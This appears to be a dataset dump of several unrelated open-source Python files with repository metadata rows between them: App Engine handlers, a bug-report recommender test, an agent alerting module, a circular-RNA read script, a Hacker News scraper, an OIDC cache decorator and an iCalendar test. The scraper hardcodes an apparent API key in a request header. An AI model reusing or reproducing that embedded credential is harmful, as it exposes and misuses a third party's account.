scheme, host, path, parameters, query, fragment = urlparse.urlparse(url)
url = 'http://www.google.com/url?sa=D&q=' + urllib.quote(url)
return 'href="%s"' % (url,)
def main():
logging.getLogger().setLevel(logging.DEBUG)
application = webapp.WSGIApplication(
#[('/', MainPageHandler)],
[
('/', MainPageHandler),
('/(.*)', PageRequestHandler),
],
debug=_DEBUG,
)
run_wsgi_app(application)
if __name__ == '__main__':
main()
"""
# Models
class Owner(db.Model):
user = db.UserProperty(required=True)
namespace = db.TextProperty()
class Page(db.Model):
owner = db.UserProperty(required=True)
name = db.StringProperty(required=True)
content = db.StringProperty()
is_public = db.BooleanProperty(default=False)
def load(name):
query = Page.gql("WHERE owner = :owner AND name = :name", owner=users.get_current_user(), name=name)
return query.fetch
"""
| lgpl-2.1 | 6,221,738,379,135,605,000 | 29.448171 | 108 | 0.608892 | false |
marquesarthur/BugAnalysisRecommender | patterny/tests/test_patterny_recommendations.py | 1 | 12679 | from __future__ import division
import json
import os
import pickle
import pprint
from random import shuffle
import numpy
import patterny.semafor.frame as _frame
from patterny.db import dao
from patterny.config import Config
from patterny.ml.similarity import ProblemSimilarity
from patterny.semafor.adapter import SemaforClient
from test_main import PatternyTest
from utils import SCRIPT_FOLDER, KDE_DATASET
from patterny.ml.tmodel import TopicModel
from patterny.analysis.summary import ProblemAnalysisTextRankSummary
from patterny.analysis.analyzer import BugAnalyses
ids_xapian_search = [
122437, 152671, 158633,
209415, 244091, 255384,
256397, 277464, 103266,
112958
]
ids_plasma_end_of_life = [
243827, 186430, 343403,
194763, 255624, 310708,
251472, 300577, 275449,
285000, 320085, 272742,
311833, 63804, 63808,
314642
]
ids_install_valgrind = [
356321, 349053, 326601,
331159, 319865, 330782,
344376, 325350
]
ids_multiple_screens = [
341674, 343369, 340267,
343772, 344671, 310168
]
ids_indexing = [
222494, 269260, 205126, 164308
]
class TestProblemAnalysis(PatternyTest):
def setup(self):
self.pp = pprint.PrettyPrinter(indent=2)
self.base_url = 'https://bugs.kde.org/show_bug.cgi?id={}'
with open(KDE_DATASET) as f:
self.config = Config(f)
self.client = SemaforClient(self.config)
def teardown(self):
pass
@staticmethod
def randomize(bugs):
result = []
index_shuf = range(len(bugs))
shuffle(index_shuf)
for idx in index_shuf:
result.append(bugs[idx])
return result
@staticmethod
def X_y(bugs, i):
test = list(bugs[i])
train = []
for j in xrange(0, len(bugs)):
if j != i:
train += bugs[j]
return train, test
def test_script(self):
# Uncomment if you want to rebuild the bugs' summaries
# bug_analyses_file = os.path.join(SCRIPT_FOLDER, 'bug_analysis_summarization.sav')
# pa_summary = ProblemAnalysisTextRankSummary(self.config)
# pa_summary.run(filter_empty_summaries=True)
# bug_analyses = BugAnalyses(pa_summary.bugs)
# pickle.dump(bug_analyses, open(bug_analyses_file, 'wb'))
# n_topics = 10
# n_top_words = 25
# n_samples = 50
# n_features = 150
# iterations = 100
n_topics = 50 # should be 100
n_top_words = 25
n_samples = None
n_features = 1500
iterations = 500
bug_analyses_file = os.path.join(SCRIPT_FOLDER, 'bug_analysis_summarization.sav')
bug_analyses = pickle.load(open(bug_analyses_file, 'rb'))
# TODO: look how to work with this guy later on
semafor_frames_file = os.path.join(SCRIPT_FOLDER, 'semafor_new_analysis.json')
with open(semafor_frames_file, 'rb') as data:
bug_semafor_map = json.load(data)
#
# bug_analyses_file = os.path.join(SCRIPT_FOLDER, 'bug_analysis_new_summarization.sav')
# bug_analyses = pickle.load(open(bug_analyses_file, 'rb'))
#
# similar_bug_analysis_file = os.path.join(SCRIPT_FOLDER, 'similar_bug_analysis_revised.json')
# with open(similar_bug_analysis_file, 'rb') as data:
# similar_bug_analysis = json.load(data)
#
# random_bug_file = os.path.join(SCRIPT_FOLDER, 'random_bug_list.sav')
# bugs = pickle.load(open(random_bug_file, 'rb'))
max_k = 10
bug_ids = bug_analyses.ids
keys = ['ids_xapian_search', 'ids_plasma_end_of_life', 'ids_install_valgrind',
'ids_multiple_screens', 'ids_indexing']
# keys = ['ids_plasma_end_of_life', 'ids_install_valgrind',
# 'ids_multiple_screens', 'ids_indexing']
keys = ['ids_xapian_search']
for i, key in enumerate(keys):
print key
exclude_ids = self.exclude(key)
X_summarized_bugs = bug_analyses.filter([bug for bug in bug_ids if bug not in exclude_ids])
y_summarized_bugs = bug_analyses.filter([bug for bug in bug_ids if bug in exclude_ids])
tmodel = TopicModel(n_samples=n_samples, n_features=n_features, n_topics=n_topics, iterations=iterations,
n_top_words=n_top_words, threshold=0.3)
tmodel.build(X_summarized_bugs.analyses, debug=True, analyses=bug_analyses)
model = ProblemSimilarity()
model.build(X_summarized_bugs)
# TODO: tmodel and check the topic of each one of the ids
j_precision = []
for j in xrange(0, len(y_summarized_bugs.ids)):
print 'Processing :: p{}'.format(j)
try:
bug_id = y_summarized_bugs.ids[j]
problem = y_summarized_bugs.problems[j]
analysis = y_summarized_bugs.analyses[j]
analysis_sentences = y_summarized_bugs.analyses_sentences[j]
recommended_similar_bugs = model.similarity(bug_id, problem, threshold=0.2)
if recommended_similar_bugs and len(recommended_similar_bugs) > max_k:
recommended_similar_bugs = recommended_similar_bugs[0:max_k]
topics_for_similar_bugs = tmodel.topics_of(
[s['id'] for s in recommended_similar_bugs]
)
top_topics = self.find_top_topics(topics_for_similar_bugs, recommended_similar_bugs)
if top_topics:
self.metrics_for(
bug_id, analysis, analysis_sentences, j_precision,
top_topics, tmodel, bug_semafor_map, recommended_similar_bugs
)
except Exception as ex:
print '>> Error on :: p{} :: {}'.format(j, ex.message)
print '\n\nDone evaluating {}'.format(key)
if j_precision:
precision = numpy.average(j_precision)
print '>> {:4.4f}'.format(precision)
print 'done'
def metrics_for(self, bug_id, analysis, analysis_sentences, j_precision, top_topics, tmodel, bug_semafor_map, recommended_similar_bugs):
t = next(iter(top_topics))
if t['topic'] in tmodel.topics:
t_ids = tmodel.topics[t['topic']].ids
t_analyses = tmodel.topics[t['topic']].analyses
t_analyses_sentences = tmodel.topics[t['topic']].analyses_sentences
_frames, _ids, _sentences = self.sentence_semantic_roles(
bug_semafor_map, t_analyses_sentences, t_ids
)
data = _frame.dataframe(_sentences, _frames, ids=_ids)
topic_synthesized_analysis = _frame.synthesize(data)
recommended = self.extract_recommended_analysis(topic_synthesized_analysis, recommended_similar_bugs)
_aux_precision = self.precision_of(bug_id, analysis, analysis_sentences, recommended, bug_semafor_map)
print _aux_precision
j_precision.append(_aux_precision)
def sentence_semantic_roles(self, bug_semafor_map, t_analyses_sentences, t_ids):
_sentences = []
_frames = []
_ids = []
for w, _id in enumerate(t_ids):
if str(str(_id)) in bug_semafor_map:
semafor_frame = bug_semafor_map[str(_id)]
current_frames = semafor_frame['frames']
if current_frames:
partial_frames = [_frame.parse(frame) for frame in current_frames]
_frames += partial_frames
_sentences += t_analyses_sentences[w]
_ids += [_id for _ in xrange(0, len(partial_frames))]
return _frames, _ids, _sentences
@staticmethod
def extract_recommended_analysis(topic_synthesized_analysis, recommended_similar_bugs):
result = []
bug_ids = [sb['id'] for sb in recommended_similar_bugs]
for synthesized_analysis in topic_synthesized_analysis:
if synthesized_analysis.contains_any(bug_ids):
result.append(synthesized_analysis)
return result
@staticmethod
def exclude(sample):
# 15
if sample == 'ids_xapian_search':
return [277464]
elif sample == 'ids_plasma_end_of_life':
return [194763, 251472, 285000, 63804, 314642]
# return [63804, 314642]
elif sample == 'ids_install_valgrind':
return [356321, 331159, 344376]
elif sample == 'ids_multiple_screens':
return [341674, 343772, 310168]
elif sample == 'ids_indexing':
return [222494, 205126]
else:
return []
@staticmethod
def similar_bugs(sample):
if sample == 'ids_xapian_search':
return ids_xapian_search
elif sample == 'ids_plasma_end_of_life':
return ids_plasma_end_of_life
elif sample == 'ids_install_valgrind':
return ids_install_valgrind
elif sample == 'ids_multiple_screens':
return ids_multiple_screens
elif sample == 'ids_indexing':
return ids_multiple_screens
else:
return []
@staticmethod
def find_top_topics(topics_for_similar_bugs, recommended_similar_bugs, k=5):
result = []
len_similar_bugs = len(recommended_similar_bugs)
if len_similar_bugs <= 1:
return None
topic_count = {}
for bug, topics in topics_for_similar_bugs.iteritems():
for topic_id in topics:
if topic_id not in topic_count:
topic_count[topic_id] = dict(count=0, prob=1)
topic_count[topic_id]['count'] += 1
current_prob = list(
map(lambda i: i['prob'],
list(
filter(lambda j: j['id'] == bug, recommended_similar_bugs))
)
)
if current_prob:
topic_count[topic_id]['prob'] *= next(iter(current_prob))
for topic, data in topic_count.iteritems():
result.append(dict(topic=topic, count=data['count'], prob=data['prob']))
if result:
result = sorted(result, key=lambda k: (k['count'], k['prob']), reverse=True)
top = next(iter(result))
if top['count'] == len_similar_bugs:
return [top]
elif len(result) >= 2:
itr = iter(result)
first_topic = next(itr)
second_topic = next(itr)
if first_topic['count'] == 1 and first_topic['count'] == second_topic['count']:
return None
else:
if k > len(result):
k = len(result)
return result[:k]
return None
@staticmethod
def _parse_tokens(data):
if 'tokens' in data:
# https://stackoverflow.com/questions/17683062/join-string-before-between-and-after
lst = [entry.encode('utf-8') for entry in data['tokens']]
return '{}{}'.format(' '.join(lst[:len(lst) - 1]), lst[-1])
return []
@staticmethod
def precision_of(bug_id, analysis, analysis_sentences, recommended, bug_semafor_map):
if str(bug_id) in bug_semafor_map:
semafor_frame = bug_semafor_map[str(bug_id)]
current_frames = semafor_frame['frames']
if current_frames:
frames = [_frame.parse(frame) for frame in current_frames]
bug_ids = []
bugs_with_similar_analyses = {}
for recommended_analysis in recommended:
bug_ids += recommended_analysis.bug_ids()
for id in bug_ids:
if id not in bugs_with_similar_analyses:
bugs_with_similar_analyses[id] = False
for recommended_analysis in recommended:
if recommended_analysis.similar_to(analysis_sentences, frames):
tp_ids = recommended_analysis.bug_ids()
for id in tp_ids:
bugs_with_similar_analyses[id] = True
tp = len(list(filter(lambda b: b is True, bugs_with_similar_analyses.values())))
total = len(bugs_with_similar_analyses.values())
result = tp / total
return result
return 0
| mit | 3,968,112,408,277,157,400 | 34.917847 | 140 | 0.56566 | false |
f3at/feat | src/feat/agents/base/alert.py | 1 | 7462 | # F3AT - Flumotion Asynchronous Autonomous Agent Toolkit
# Copyright (C) 2010,2011 Flumotion Services, S.A.
# All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# See "LICENSE.GPL" in the source distribution for more information.
# Headers in this file shall remain intact.
# -*- Mode: Python -*-
# vi:si:et:sw=4:sts=4:ts=4
from zope.interface import implements
from feat.agents.base import replay, poster, contractor
from feat.agencies import recipient, message
from feat.common import serialization, annotate, container, formatable
from feat.agents.application import feat
from feat.interface.alert import IAlertFactory, Severity, IAlert
from feat.interface.protocols import InterestType
def may_raise(factory):
annotate.injectClassCallback("alert", 3, "_register_alert_factory",
factory)
@feat.register_restorator
class AlertingAgentEntry(formatable.Formatable):
'''
Represents internal state of the alerts the agent is responsible for.
'''
formatable.field('hostname', None)
formatable.field('agent_id', None)
formatable.field('alerts', []) #[IAlertFactory]
formatable.field('statuses', dict()) # name -> (count, info, severity)
class AlertsDiscoveryContractor(contractor.BaseContractor):
protocol_id = 'discover-alerts'
interest_type = InterestType.public
@replay.journaled
def announced(self, state, announcement):
payload = AlertingAgentEntry(
hostname=state.agent.get_hostname(),
agent_id=state.agent.get_agent_id(),
alerts=state.agent.get_alert_factories().values(),
statuses=state.agent.get_alert_statuses())
state.medium.bid(message.Bid(payload=payload))
class MetaAlert(type(serialization.Serializable)):
implements(IAlertFactory)
class BaseAlert(serialization.Serializable):
__metaclass__ = MetaAlert
implements(IAlert)
name = None
description = None
persistent = False
def __init__(self, hostname, agent_id, status_info=None,
severity=Severity.warn):
if not isinstance(severity, Severity):
raise TypeError(severity)
self.name = type(self).name
self.severity = severity
self.hostname = hostname
self.agent_id = agent_id
self.status_info = status_info
assert self.name is not None, \
"Class %r should have name attribute set" % (type(self), )
@feat.register_restorator
class DynamicAlert(formatable.Formatable):
implements(IAlert, IAlertFactory)
formatable.field('name', None)
formatable.field('severity', None)
formatable.field('hostname', None)
formatable.field('status_info', None)
formatable.field('agent_id', None)
formatable.field('description', None)
formatable.field('persistent', False)
def __call__(self, hostname, agent_id, status_info,
severity=Severity.warn):
assert self.name is not None, \
"DynamicAlert %r should have name attribute set" % (self, )
if not isinstance(severity, Severity):
raise TypeError(severity)
return type(self)(
name=self.name,
severity=severity,
description=self.description,
persistent=self.persistent,
hostname=hostname,
agent_id=agent_id,
status_info=status_info)
class AgentMixin(object):
_alert_factories = container.MroDict("_mro_alert_factories")
### anotations ###
@classmethod
def _register_alert_factory(cls, factory):
f = IAlertFactory(factory)
cls._alert_factories[f.name] = f
### public ###
@replay.mutable
def initiate(self, state):
state.medium.register_interest(AlertsDiscoveryContractor)
recp = recipient.Broadcast(AlertPoster.protocol_id,
self.get_shard_id())
state.alerter = self.initiate_protocol(AlertPoster, recp)
# service_name -> IAlertFactory
state.alert_factories = dict(type(self)._alert_factories)
# name -> (count, status_info)
state.alert_statuses = dict()
@replay.mutable
def raise_alert(self, state, service_name, status_info=None,
severity=Severity.warn):
if service_name in state.alert_statuses:
count = state.alert_statuses[service_name][0] + 1
old_severity = state.alert_statuses[service_name][2]
if old_severity is None:
old_severity = severity
else:
count = 1
old_severity = severity
# raise a new alert cannot change the severity warn -> critical
severity = max([old_severity, severity])
state.alert_statuses[service_name] = (count, status_info, severity)
alert = self._generate_alert(service_name, status_info,
severity=severity)
state.alerter.notify('raised', alert)
@replay.mutable
def resolve_alert(self, state, service_name, status_info=None):
alert = self._generate_alert(service_name, status_info,
severity=Severity.ok)
state.alerter.notify('resolved', alert)
state.alert_statuses[service_name] = (0, status_info, Severity.ok)
@replay.mutable
def may_raise_alert(self, state, factory):
f = IAlertFactory(factory)
state.alert_factories[factory.name] = f
### private ###
@replay.mutable
def _fix_alert_poster(self, state, shard):
'''
Called after agent has switched a shard. Alert poster needs an update
in this case, bacause otherwise its posting to lobby instead of the
shard exchange.
'''
recp = recipient.Broadcast(AlertPoster.protocol_id, shard)
state.alerter.update_recipients(recp)
@replay.immutable
def _generate_alert(self, state, service_name, status_info,
severity):
alert_factory = state.alert_factories.get(service_name, None)
assert alert_factory is not None, \
"Unknown service name %r" % (service_name, )
return alert_factory(hostname=state.medium.get_hostname(),
status_info=status_info,
severity=severity,
agent_id=self.get_agent_id())
### used by discovery contractor ###
@replay.immutable
def get_alert_factories(self, state):
return state.alert_factories
@replay.immutable
def get_alert_statuses(self, state):
return state.alert_statuses
class AlertPoster(poster.BasePoster):
protocol_id = 'alert'
def pack_payload(self, action, alert):
return action, alert
| gpl-2.0 | -4,525,965,524,705,380,000 | 32.918182 | 77 | 0.649022 | false |
dieterich-lab/FUCHS | GCB_testset/FUCHS/get_mate_information.py | 1 | 5784 | # script to identify circles where both mates map over the junction
import pysam
import os
import argparse
import pybedtools
import tempfile
parser = argparse.ArgumentParser(description='Extracts mate information and identify singe and double breakpoint fragments')
# input
parser.add_argument('bamfolder', metavar = 'PATH', help = 'path to folder containing circle bamfiles' )
parser.add_argument('outfile', metavar = 'outfile', help = 'path and filename to write the output to' )
parser.add_argument('-a', dest = 'bedfile' ,default = 'none', help = 'if specified, the program will try to infer the circle length without internal introns')
parser.add_argument('-p', dest = 'ref_platform', default = 'refseq', help = 'specifies the annotation platform which was used (refseq or ensembl)')
parser.add_argument('-s', dest = 'split_character', default = '_', help = 'specifies the separator within the name column in bedfile')
parser.add_argument('--tmp', dest = 'tmp_folder', default = '.', help = 'tempfolder to store tempfiles generated by pybedtools.')
args = parser.parse_args()
# parse arguments
bamfolder = args.bamfolder
outfile = args.outfile
bedfile = args.bedfile
platform = args.ref_platform
split_character = args.split_character
tmp_folder = args.tmp_folder
# define functions
def get_reads_from_bamfile(bamfile, circle_coordinates):
mates = {}
non_junction_fragments = []
circle = pysam.AlignmentFile(bamfile, "rb")
for lola in circle:
name = lola.query_name
reverse = lola.is_reverse
start = lola.reference_start
end = lola.reference_end
if not name in mates:
mates[name] = {'forward' : {'start' : [], 'end' : []}, 'reverse' : {'start' : [], 'end' : []} }
if reverse and end == circle_coordinates[2]:
mates[name]['reverse']['end'] += [start]
elif reverse and start == circle_coordinates[1] - 1:
mates[name]['reverse']['start'] += [end]
elif end == circle_coordinates[2] and not reverse:
mates[name]['forward']['end'] += [start]
elif start == circle_coordinates[1] - 1 and not reverse:
mates[name]['forward']['start'] += [end]
else:
non_junction_fragments += [lola]
circle.close()
return(mates, non_junction_fragments)
def classify_reads(mates):
for lola in mates:
strands = 0
for strand in mates[lola]:
if len(mates[lola][strand]['start']) == 1 and len(mates[lola][strand]['end']) == 1:
strands += 1
if strands == 1:
mates[lola]['status'] = 'single'
elif strands == 2:
mates[lola]['status'] = 'double'
else:
mates[lola]['status'] = 'undefined'
return(mates)
def get_statistics(mates):
stats = {'single': 0, 'double': 0, 'undefined': 0}
for lola in mates:
stats[mates[lola]['status']] += 1
return(stats)
def annotate_circle(circle_coordinates, bedfile, platform, split_character):
circle = pybedtools.BedTool('%s %s %s' %(circle_coordinates[0], circle_coordinates[1], circle_coordinates[2]), from_string=True)
exons = pybedtools.example_bedtool(bedfile)
features = exons.intersect(circle)
lengths = {}
for lola in features:
if platform == 'refseq':
transcript_name = split_character.join(lola[3].split(split_character)[0:2])
elif platform == 'ensembl':
transcript_name = lola[3].split(split_character)[0]
else:
transcript_name = 'NA'
print('you are using an unkown reference platform. Please choose between refseq or ensembl')
length = int(lola[2]) - int(lola[1])
if not transcript_name in lengths:
lengths[transcript_name] = 0
lengths[transcript_name] += length
return(lengths)
def iterate_over_folder(inputfolder, bedfile, platform, split_character):
results = {}
files = os.listdir(inputfolder)
for lola in files:
if lola.split('.')[-1] == 'bam':
print(lola)
circle_coordinates = ['_'.join(lola.split('_')[0:-3]), int(lola.split('_')[-3]), int(lola.split('_')[-2])]
num_reads = int(lola.split('_')[-1].split('.')[0]. replace('reads', ''))
MATES, FRAGMENTS = get_reads_from_bamfile('%s/%s' %(inputfolder, lola), circle_coordinates)
MATES = classify_reads(MATES)
if not bedfile == 'none':
LENGTH = annotate_circle(circle_coordinates, bedfile, platform, split_character)
else:
LENGTH = {}
STATS = get_statistics(MATES)
results[lola.split('.')[0]] = STATS
if len(LENGTH) > 0:
results[lola.split('.')[0]]['min_length'] = min(LENGTH.items(), key=lambda x: x[1])[1]
results[lola.split('.')[0]]['max_length'] = max(LENGTH.items(), key=lambda x: x[1])[1]
results[lola.split('.')[0]]['transcript_ids'] = ','.join(LENGTH.keys())
else:
results[lola.split('.')[0]]['min_length'] = circle_coordinates[2] - circle_coordinates[1]
results[lola.split('.')[0]]['max_length'] = circle_coordinates[2] - circle_coordinates[1]
results[lola.split('.')[0]]['transcript_ids'] = 'not_annotated'
results[lola.split('.')[0]]['circle_id'] = '%s_%s_%s' %(circle_coordinates[0], circle_coordinates[1], circle_coordinates[2])
results[lola.split('.')[0]]['num_reads'] = num_reads
return(results)
def write_results(results, outfile):
O = open(outfile, 'w')
O.write('circle_id\ttranscript_ids\tnum_reads\tmin_length\tmax_length\tsingle\tdouble\tundefined\n') # eventually add gene name and length also with exons
circles = sorted(results.keys())
for lola in circles:
O.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n' %(results[lola]['circle_id'],results[lola]['transcript_ids'], results[lola]['num_reads'], results[lola]['min_length'], results[lola]['max_length'], results[lola]['single'], results[lola]['double'], results[lola]['undefined']))
O.close()
return
tempfile.tempdir = tmp_folder
RESULTS = iterate_over_folder(bamfolder, bedfile, platform, split_character)
write_results(RESULTS, outfile)
| gpl-3.0 | 2,426,196,590,104,939,500 | 41.529412 | 270 | 0.66926 | false |
bikalabs/bika.wine | bika/wine/controlpanel/bika_winetypes.py | 1 | 3152 | from AccessControl.SecurityInfo import ClassSecurityInfo
from bika.wine import bikaMessageFactory as _
from bika.wine.config import PROJECTNAME
from bika.wine.interfaces import IWineTypes
from bika.lims import bikaMessageFactory as _b
from bika.lims.browser.bika_listing import BikaListingView
from plone.app.content.browser.interfaces import IFolderContentsView
from plone.app.folder.folder import ATFolderSchema, ATFolder
from plone.app.layout.globals.interfaces import IViewView
from Products.Archetypes import atapi
from Products.ATContentTypes.content import schemata
from zope.interface.declarations import implements
class WineTypesView(BikaListingView):
implements(IFolderContentsView, IViewView)
def __init__(self, context, request):
super(WineTypesView, self).__init__(context, request)
self.catalog = 'bika_setup_catalog'
self.contentFilter = {'portal_type': 'WineType',
'sort_on': 'sortable_title'}
self.context_actions = {
_b('Add'): {
'url': 'createObject?type_name=WineType',
'icon': '++resource++bika.lims.images/add.png'
}
}
self.icon = self.portal_url + \
"/++resource++bika.wine.images/winetype_big.png"
self.title = self.context.translate(_("Wine types"))
self.description = ""
self.show_sort_column = False
self.show_select_row = False
self.show_select_column = True
self.pagesize = 25
self.columns = {
'Title': {'title': _('Wine type'),
'index': 'sortable_title'},
'Description': {'title': _b('Description'),
'index': 'description',
'toggle': True},
}
self.review_states = [
{'id': 'default',
'title': _b('Active'),
'contentFilter': {'inactive_state': 'active'},
'transitions': [{'id': 'deactivate'}, ],
'columns': ['Title', 'Description']},
{'id': 'inactive',
'title': _b('Inactive'),
'contentFilter': {'inactive_state': 'inactive'},
'transitions': [{'id': 'activate'}, ],
'columns': ['Title', 'Description']},
{'id': 'all',
'title': _b('All'),
'contentFilter': {},
'columns': ['Title', 'Description']},
]
def folderitems(self):
items = BikaListingView.folderitems(self)
for x in range(len(items)):
if 'obj' not in items[x]:
continue
obj = items[x]['obj']
items[x]['Description'] = obj.Description()
items[x]['replace']['Title'] = "<a href='%s'>%s</a>" % \
(items[x]['url'], items[x]['Title'])
return items
schema = ATFolderSchema.copy()
class WineTypes(ATFolder):
implements(IWineTypes)
security = ClassSecurityInfo()
displayContentsTab = False
schema = schema
schemata.finalizeATCTSchema(schema, folderish=True, moveDiscussion=False)
atapi.registerType(WineTypes, PROJECTNAME)
| agpl-3.0 | 8,972,393,778,364,871,000 | 36.082353 | 73 | 0.579632 | false |
blackchair/news-yc | frontpage.py | 1 | 4592 | import os
import json
import logging
from urllib import quote
from xml.dom.minidom import parseString
from datetime import datetime
import webapp2, jinja2
from google.appengine.api.urlfetch import fetch
from google.appengine.api import memcache
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
fp_template = JINJA_ENVIRONMENT.get_template('fp.html')
def pluck(xml,tag):
try:
return xml.getElementsByTagName(tag)[0].firstChild.data
except:
return None
def get_summary(url,item_id):
summary = memcache.get('summary:'+str(item_id))
if summary is None:
try:
resp = fetch(url='https://tldr.p.mashape.com/summary?url='+quote(url),headers={"X-Mashape-Authorization": "i4fhqn7lk07QLkk3kJ8ALzVjgqvQU5TW"})
summary=resp.content
except:
pass
#resp = json.loads(resp.content)
'''
if 'error' in resp.keys():
summary = "None"
else:
summary = resp['data']['summary']
'''
if summary and not memcache.add('summary:'+str(item_id),summary,0):
logging.error('Memcache set failed')
class MainPage(webapp2.RequestHandler):
def get(self):
frontpage = memcache.get('frontpage')
if frontpage is None:
fp_req = fetch('https://www.hnsearch.com/bigrss')
fp_xml = parseString(fp_req.content)
#parse out an array of story dicts
fp_items = []
fp_5 = []
items_xml = fp_xml.getElementsByTagName('item')
for i,item_xml in enumerate(items_xml):
#fields:
# title, link, comments,hnsearch_id,username,create_ts
# num_comments, points, description, guid
item = {
"title": pluck(item_xml,"title"),
"link": pluck(item_xml,"link"),
"comments": pluck(item_xml,"comments"),
"id": pluck(item_xml,"hnsearch_id"),
"username": pluck(item_xml,"username"),
"create_ts": pluck(item_xml,"create_ts"),
"num_comments": pluck(item_xml,"num_comments"),
"points": pluck(item_xml,"points")
}
if item['create_ts'] is not None:
#look here for explanation of ranking:
#http://www.righto.com/2013/11/how-hacker-news-ranking-really-works.html
item['num_comments'] = int(item['num_comments'])
item['points'] = float(item['points'])
delta = datetime.utcnow() - datetime.strptime(item['create_ts'],"%Y-%m-%dT%H:%M:%SZ")
hours_ago = delta.total_seconds() / 3600
item['raw_score'] = (item['points']-1.0) ** 0.8 / (float(hours_ago)+2.0) ** 1.8
item['controversy'] = item['num_comments'] >= 40 and item['num_comments'] > item['points']
#item['summary'] = get_summary(item['link'],item['id'])
if i < 3:
fp_items.append(item)
elif i == 3:
#calculate prev_score and then penalty for all 5
fp_items.append(item)
fp_5 = [x['raw_score'] for x in fp_items]
prev_score = sum(fp_5)/float(len(fp_5))
for k in fp_items:
k['penalty'] = 1.0
else:
prev_score = sum(fp_5)/float(len(fp_5))
if item['raw_score'] > prev_score:
item['penalty'] = prev_score / item['raw_score']
else:
item['penalty'] = 1.0
fp_5.pop(0)
fp_5.append(item['raw_score'])
prev_score = sum(fp_5)/float(len(fp_5))
fp_items.append(item)
#use points and create_ts to determine ranking
fp_items.sort(key=lambda x: -x['raw_score'])
#pass to jinja template
frontpage = fp_template.render({"items":fp_items})
#cache result
if not memcache.add('frontpage',frontpage,60):
logging.error('Memcache set failed')
self.response.write(frontpage)
application = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
| mit | -6,088,560,428,802,341,000 | 39.637168 | 154 | 0.515679 | false |
ByteInternet/drf-oidc-auth | oidc_auth/util.py | 1 | 1153 | import functools
from django.core.cache import caches
from .settings import api_settings
class cache(object):
""" Cache decorator that memoizes the return value of a method for some time.
Increment the cache_version everytime your method's implementation changes
in such a way that it returns values that are not backwards compatible.
For more information, see the Django cache documentation:
https://docs.djangoproject.com/en/2.2/topics/cache/#cache-versioning
"""
def __init__(self, ttl, cache_version=1):
self.ttl = ttl
self.cache_version = cache_version
def __call__(self, fn):
@functools.wraps(fn)
def wrapped(this, *args):
cache = caches[api_settings.OIDC_CACHE_NAME]
key = api_settings.OIDC_CACHE_PREFIX + '.'.join([fn.__name__] + list(map(str, args)))
cached_value = cache.get(key, version=self.cache_version)
if not cached_value:
cached_value = fn(this, *args)
cache.set(key, cached_value, timeout=self.ttl, version=self.cache_version)
return cached_value
return wrapped
| mit | 5,006,340,279,037,631,000 | 35.03125 | 97 | 0.648742 | false |
hforge/itools | test/test_ical.py | 1 | 16037 | # -*- coding: UTF-8 -*-
# Copyright (C) 2005-2010 J. David Ibáñez <[email protected]>
# Copyright (C) 2006-2007 Nicolas Deram <[email protected]>
# Copyright (C) 2010 Alexis Huet <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import from the Standard Library
from datetime import datetime, timedelta, tzinfo
from unittest import TestCase, main
# Import from itools
from itools.csv import Property
from itools.csv.table import encode_param_value
from itools.datatypes import String
from itools.ical import DateTime
from itools.ical.icalendar import iCalendar, VTimezone
#
# Example with 1 event
content = """
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN
METHOD:PUBLISH
BEGIN:VEVENT
UID:581361a0-1dd2-11b2-9a42-bd3958eeac9a
SUMMARY:Résumé
DESCRIPTION:all all all
LOCATION:France
STATUS:TENTATIVE
CLASS:PRIVATE
X-MOZILLA-RECUR-DEFAULT-INTERVAL:0
DTSTART;VALUE="DATE":20050530
DTEND;VALUE=DATE:20050531
DTSTAMP:20050601T074604Z
ATTENDEE;RSVP=TRUE;MEMBER="mailto:[email protected]":mailto:[email protected]
ATTENDEE;MEMBER="mailto:[email protected]":mailto:[email protected]
PRIORITY:1
SEQUENCE:0
END:VEVENT
END:VCALENDAR
"""
# Example with 2 events
content2 = """
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN
METHOD:PUBLISH
BEGIN:VEVENT
UID:581361a0-1dd2-11b2-9a42-bd3958eeac9a
SUMMARY:Refound
DESCRIPTION:all all all
LOCATION:France
STATUS:TENTATIVE
CLASS:PRIVATE
X-MOZILLA-RECUR-DEFAULT-INTERVAL:0
DTSTART;VALUE="DATE":20050530T000000
DTEND;VALUE=DATE:20050531T235959.999999
DTSTAMP:20050601T074604Z
ATTENDEE;RSVP=TRUE;MEMBER="mailto:[email protected]":mailto:[email protected]
PRIORITY:1
SEQUENCE:0
END:VEVENT
BEGIN:VEVENT
UID:581361a0-1dd2-11b2-9a42-bd3958eeac9b
SUMMARY:222222222
DTSTART;VALUE="DATE":20050701
DTEND;VALUE=DATE:20050701
ATTENDEE;RSVP=TRUE;MEMBER="mailto:[email protected]":mailto:[email protected]
PRIORITY:2
SEQUENCE:0
END:VEVENT
END:VCALENDAR
"""
tz_file_test = frozenset([
# Input datetime , tzname, dst, utcoffset
((1967, 4, 30, 2, 0, 1), ('EDT', (0, 3600), (-1, 72000))),
((1971, 12, 25, 12, 42, 00), ('EST', (0, 0), (-1, 68400))),
((1973, 4, 28, 6, 59, 59), ('EST', (0, 0), (-1, 68400))),
((1974, 4, 29, 6, 59, 59), ('EDT', (0, 3600), (-1, 72000))),
((1986, 2, 12, 12, 42, 0), ('EST', (0, 0), (-1, 68400))),
